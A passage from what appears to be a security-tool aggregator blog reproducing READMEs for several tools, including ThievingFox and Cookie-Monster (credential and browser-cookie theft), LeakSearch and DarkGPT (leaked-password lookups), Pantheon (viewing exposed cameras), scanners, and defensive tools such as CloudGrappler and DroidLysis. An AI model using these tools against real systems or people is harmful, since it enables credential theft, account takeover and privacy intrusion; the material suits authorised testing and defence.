The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications

Collect

For each application specified on the command line parameters, the collect module retrieves output files on the remote host stored inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and retrieved data is stored in client/ouput/.

Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of th e domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications


HackerInfo - Infromations Web Application Security

By: Zion3R




Infromations Web Application Security


install :

sudo apt install python3 python3-pip

pip3 install termcolor

pip3 install google

pip3 install optioncomplete

pip3 install bs4


pip3 install prettytable

git clone https://github.com/Matrix07ksa/HackerInfo/

cd HackerInfo

chmod +x HackerInfo

./HackerInfo -h



python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
h ttps://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms _hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finshid]########################

Usage:

Hackerinfo infromations Web Application Security (11)

Library install hackinfo:

sudo python setup.py install
pip3 install hackinfo



Cookie-Monster - BOF To Steal Browser Cookies & Credentials

By: Zion3R


Steal browser cookies for edge, chrome and firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s) and then filelessly download the target. Once the Cookies/Login Data file(s) are downloaded, the python decryption script can help extract those secrets! Firefox module will parse the profiles.ini and locate where the logins.json and key4.db files are located and download them. A seperate github repo is referenced for offline decryption.


BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-moster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file
--edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file
--edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file

EXE usage

Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chome/Edge Passwords File

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd

Installation

Ensure Mingw-w64 and make is installed on the linux prior to compiling.

make

to compile exe on windows

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

TO-DO

  • update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

References

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

By: Zion3R


Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


Notes

To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

Required Packages

bash pip3 install -r requirements.txt

Cloning cloudgrep locally

To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

bash chmod +x clone.sh ./clone.sh

Input

This tool offers a CLI (Command Line Interface). As such, here we review its use:

Example 1 - Running the tool with default queries file

Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

Note

Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}

],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}

Run command

python3 main.py

Example 2 - Permiso Intel Use Case

python3 main.py -p

[+] Running GetFileDownloadUrls.*secrets_ for AWS 
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.

Example 3 - Generate report

python3 main.py -p -jo

reports
โ””โ”€โ”€ json
โ”œโ”€โ”€ AWS
โ”‚ย ย  โ””โ”€โ”€ 2024-03-04 01:01 AM
โ”‚ย ย  โ””โ”€โ”€ cloudtrail-logs-00000000-ffffff--
โ”‚ย ย  โ””โ”€โ”€ testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
โ”‚ย ย  โ””โ”€โ”€ GetFileDownloadUrls.*secrets_.json
โ””โ”€โ”€ AZURE
โ””โ”€โ”€ 2024-03-04 01:01 AM
โ””โ”€โ”€ logs
โ””โ”€โ”€ cloudgrappler
โ””โ”€โ”€ okta_key.json

Example 4 - Filtering logs based on date or time

python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

Example 5 - Manually adding queries and data source types

python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

Example 6 - Running the tool with your own queries file

python3 main.py -f new_file.json

Running in your Cloud and Authentication cloudgrep

AWS

Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.

Azure

The simplest way to authenticate with Azure is to first run:

az login

This will open a browser window and prompt you to login to Azure.



ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols utilized By IoT Devices

By: Zion3R


ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.


~ Hilali Abdel

USAGE

python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

[Add new Device]

python3 smartthings.py -a 192.168.1.1

python3 smarthings.py -s --type TPLINK

python3 smartthings.py -s --firmware TP-Link Archer C7v2

Search for CVE and Poc [ firmware and device type]

ย 

Scan device for open upnp ports

python3 smartthings.py -s --scan upnp --id

get data from mqtt 'subscribe'

python3 smartthings.py -s --scan mqtt --id



DroidLysis - Property Extractor For Android Apps

By: Zion3R


DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.


Installing DroidLysis

  1. Install required system packages
sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev
  1. Install Android disassembly tools

  2. Apktool ,

  3. Baksmali, and optionally
  4. Dex2jar and
  5. Obsolete: Procyon (note that Procyon only works with Java 8, not Java 11).
$ mkdir -p ~/softs
$ cd ~/softs
$ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
$ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
$ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
$ unzip dex-tools-v2.4.zip
$ rm -f dex-tools-v2.4.zip
  1. Get DroidLysis from the Git repository (preferred) or from pip

Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

$ python3 -m venv venv
$ source ./venv/bin/activate
(venv) $ pip3 install git+https://github.com/cryptax/droidlysis

Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis).

  1. Configure conf/general.conf. In particular make sure to change /home/axelle with your appropriate directories.
[tools]
apktool = /home/axelle/softs/apktool_2.9.3.jar
baksmali = /home/axelle/softs/baksmali-2.5.2.jar
dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
keytool = /usr/bin/keytool
...
  1. Run it:
python3 ./droidlysis3.py --help

Configuration

The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql)

Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.

Usage

DroidLysis uses Python 3. To launch it and get options:

droidlysis --help

For example, test it on Signal's APK:

droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

DroidLysis outputs:

  • A summary on the console (see image above)
  • The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum. For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
  • A database (by default, SQLite droidlysis.db) containing properties it noticed.

Options

Get usage with droidlysis --help

  • The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other type of files (unless there is a bug...) but won't be able to understand the content.

  • When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here)

  • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

  • DroidLysis's analysis does not inspect known 3rd party SDK by default, i.e. for instance it won't report any suspicious activity from these. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisment) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

Sample output directory (--output DIR)

This directory contains (when applicable):

  • A readable AndroidManifest.xml
  • Readable resources in res
  • Libraries lib, assets assets
  • Disassembled Smali code: smali (and others)
  • Package meta information: META-INF
  • Package contents when simply unzipped in ./unzipped
  • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

The following files are generated by DroidLysis:

  • autoanalysis.md: lists each pattern DroidLysis detected and where.
  • report.md: same as what was printed on the console

If you do not need the sample output directory to be generated, use the option --clearoutput.

Import trackers from Exodus etc (--import-exodus)

$ python3 ./droidlysis3.py --import-exodus --verbose
Processing file: ./droidurl.pyc ...
DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

SQLite database{#sqlite_database}

If you want to process a directory of samples, you'll probably like to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table is relative to a given sample. Each column is properties DroidLysis tracks.

For example, to retrieve all filename, SHA256 sum and smali properties of the database:

sqlite> select sha256, sanitized_basename, smali_properties from samples;
f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
...

Property patterns

What DroidLysis detects can be configured and extended in the files of the ./conf directory.

A pattern consist of:

  • a tag name: example send_sms. This is to name the property. Must be unique across the .conf file.
  • a pattern: this is a regexp to be matched. Ex: ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is match on Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
  • a description (optional): explains the importance of the property and what it means.
[send_sms]
pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
description=Sending SMS messages

Importing Exodus Privacy Trackers

Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add option --import_exodus to the droidlysis command line: this will parse existing trackers Exodus Privacy knows and which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.

Afterwards, you may want to sort your kit.conf file:

import configparser
import collections
import os

config = configparser.ConfigParser({}, collections.OrderedDict)
config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
# Order all sections alphabetically
config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
with open('sorted.conf','w') as f:
config.write(f)

Updates

  • v3.4.6 - Detecting manifest feature that automatically loads APK at install
  • v3.4.5 - Creating a writable user kit.conf file
  • v3.4.4 - Bug fix #14
  • v3.4.3 - Using configuration files
  • v3.4.2 - Adding import of Exodus Privacy Trackers
  • v3.4.1 - Removed dependency to Androguard
  • v3.4.0 - Multidex support
  • v3.3.1 - Improving detection of Base64 strings
  • v3.3.0 - Dumping data to JSON
  • v3.2.1 - IP address detection
  • v3.2.0 - Dex2jar is optional
  • v3.1.0 - Detection of Base64 strings


DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes

By: Zion3R


DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.


Prerequisites

Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.

Environment Setup

  1. Clone the Repository

First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:

git clone https://github.com/luijait/DarkGPT.git cd DarkGPT

  1. Configure Environment Variables

You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:

DEHASHED_API_KEY="your_dehashed_api_key_here"

  1. Install Dependencies

This project requires certain Python packages to run. Install them by running the following command:

pip install -r requirements.txt 4. Then Run the project: python3 main.py



LeakSearch - Search & Parse Password Leaks

By: Zion3R


LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.

In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.


Requirements
  • Python 3
  • Install requirements

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/LeakSearch

Usage
  _               _     ____                      _     
| | ___ __ _| | __/ ___| ___ __ _ _ __ ___| |__
| | / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \
| |__| __/ (_| | < ___) | __/ (_| | | | (__| | | |
|_____\___|\__,_|_|\_\|____/ \___|\__,_|_| \___|_| |_|

------------------- by @JoelGMSec -------------------

usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

options:
-h, --help show this help message and exit
-d DATABASE, --database DATABASE
Database used for the search (ProxyNova or LocalDataBase)
-k KEYWORD, --keyword KEYWORD
Keyword (user/domain/pass) to search for leaks in the DB
-n NUMBER, --number NUMBER
Number of results to show (default is 20)
-o OUTPUT, --output OUTPUT
Save the results as json or txt into a file
-p PROXY, --proxy PROXY
Set HTTP/S proxy (like http://localhost:8080)


The detailed guide of use can be found at the following link:

https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch


License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.


Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gรกmez Molina (@JoelGMSec).


Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



Pantheon - Insecure Camera Parser

By: Zion3R


Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

Functionalities

Pantheon allows users to execute an API crawler. There was original functionality without the use of any API's (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.


Installation

  1. git clone https://github.com/josh0xA/Pantheon.git
  2. cd Pantheon
  3. pip3 install -r requirements.txt
    Execution: python3 pantheon.py
  • Note: I will later add a GUI installer to make it fully indepenent of a CLI

Windows

  • You can just follow the steps above or download the official package here.
  • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

Ubuntu

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/ubuntu_install.sh
  • ./distros/ubuntu_install.sh

Debian and Kali Linux

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/debian-kali_install.sh
  • ./distros/debian-kali_install.sh

MacOS

  • The regular installation steps above should suffice. If not, open up an issue.

Usage

(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk)

(Left-click) on a selected IP:Port to view the geolocation of the camera.
(Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac).

Adjust the map as you please to see the markers.

  • Also note that this app is far from perfect and not every link that shows up is a live-feed, some are login pages (Do NOT attempt to login).

Ethical Notice

The developer of this program, Josh Schiavone, is not resposible for misuse of this data gathering tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: https://joshschiavone.com/panth_info/panth_ethical_notice.html

Licence

MIT License
Copyright (c) Josh Schiavone



NetworkSherlock - Powerful And Flexible Port Scanning Tool With Shodan

By: Zion3R


NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.


Features

  • Scans multiple IPs, IP ranges, and CIDR blocks.
  • Supports port scanning over TCP and UDP protocols.
  • Detailed banner grabbing feature.
  • Ping check for identifying reachable targets.
  • Multi-threading support for fast scanning operations.
  • Option to save scan results to a file.
  • Provides detailed version information.
  • Colorful console output for better readability.
  • Shodan integration for enhanced scanning capabilities.
  • Configuration file support for Shodan API key.

Installation

NetworkSherlock requires Python 3.6 or later.

  1. Clone the repository:
    git clone https://github.com/HalilDeniz/NetworkSherlock.git
  2. Install the required packages:
    pip install -r requirements.txt

Configuration

Update the networksherlock.cfg file with your Shodan API key:

[SHODAN]
api_key = YOUR_SHODAN_API_KEY

Usage

Port Scan Tool positional arguments: target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5, 192.168.1.0/24) options: -h, --help show this help message and exit -p PORTS, --ports PORTS Ports to scan (e.g. 1-1024, 21,22,80, or 80) -t THREADS, --threads THREADS Number of threads to use -P {tcp,udp}, --protocol {tcp,udp} Protocol to use for scanning -V, --version-info Used to get version information -s SAVE_RESULTS, --save-results SAVE_RESULTS File to save scan results -c, --ping-check Perform ping check before scanning --use-shodan Enable Shodan integration for additional information " dir="auto">
python3 networksherlock.py --help
usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target

NetworkSherlock: Port Scan Tool

positional arguments:
target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
192.168.1.0/24)

options:
-h, --help show this help message and exit
-p PORTS, --ports PORTS
Ports to scan (e.g. 1-1024, 21,22,80, or 80)
-t THREADS, --threads THREADS
Number of threads to use
-P {tcp,udp}, --protocol {tcp,udp}
Protocol to use for scanning
-V, --version-info Used to get version information
-s SAVE_RESULTS, --save-results SAVE_RESULTS
File to save scan results
-c, --ping-check Perform ping check before scanning
--use-shodan Enable Shodan integration for additional information

Basic Parameters

  • target: The target IP address(es), IP range, or CIDR block to scan.
  • -p, --ports: Ports to scan (e.g., 1-1000, 22,80,443).
  • -t, --threads: Number of threads to use.
  • -P, --protocol: Protocol to use for scanning (tcp or udp).
  • -V, --version-info: Obtain version information during banner grabbing.
  • -s, --save-results: Save results to the specified file.
  • -c, --ping-check: Perform a ping check before scanning.
  • --use-shodan: Enable Shodan integration.

Example Usage

Basic Port Scan

Scan a single IP address on default ports:

python networksherlock.py 192.168.1.1

Custom Port Range

Scan an IP address with a custom range of ports:

python networksherlock.py 192.168.1.1 -p 1-1024

Multiple IPs and Port Specification

Scan multiple IP addresses on specific ports:

python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443

CIDR Block Scan

Scan an entire subnet using CIDR notation:

python networksherlock.py 192.168.1.0/24 -p 80

Using Multi-Threading

Perform a scan using multiple threads for faster execution:

python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20

Scanning with Protocol Selection

Scan using a specific protocol (TCP or UDP):

python networksherlock.py 192.168.1.1 -p 53 -P udp

Scan with Shodan

python networksherlock.py 192.168.1.1 --use-shodan

Scan Multiple Targets with Shodan

python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan

Banner Grabbing and Save Results

Perform a detailed scan with banner grabbing and save results to a file:

python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt

Ping Check Before Scanning

Scan an IP range after performing a ping check:

python networksherlock.py 10.0.0.1-10.0.0.255 -c

OUTPUT EXAMPLE

$ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000 -t 25
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21-6000
Threads : 25
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
21 /tcp open telnet 220 (vsFTPd 2.3.4)
80 /tcp open http HTTP/1.1 200 OK
139 /tcp open netbios-ssn %SMBr
25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
23 /tcp open smtp #' #'
445 /tcp open microsoft-ds %SMBr
514 /tcp open shell
512 /tcp open exec Where are you?
1524/tcp open ingreslock ro ot@metasploitable:/#
2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
3306/tcp open mysql >
5900/tcp open unknown RFB 003.003
53 /tcp open domain
---------------------------------------------

OutPut Example

$ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
********************************************
Scanning target: 10.0.2.1
Scanning IP : 10.0.2.1
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
53 /tcp open domain
********************************************
Scanning target: 10.0.2.2
Scanning IP : 10.0.2.2
Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
445 /tcp open microsoft-ds
135 /tcp open epmap
********************************************
Scanning target: 10.0.2.12
Scanning IP : 10.0.2.12
Ports : 21- 1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
21 /tcp open ftp 220 (vsFTPd 2.3.4)
22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
23 /tcp open telnet #'
80 /tcp open http HTTP/1.1 200 OK
53 /tcp open kpasswd 464/udpcp
445 /tcp open domain %SMBr
3306/tcp open mysql >
********************************************
Scanning target: 10.0.2.20
Scanning IP : 10.0.2.20
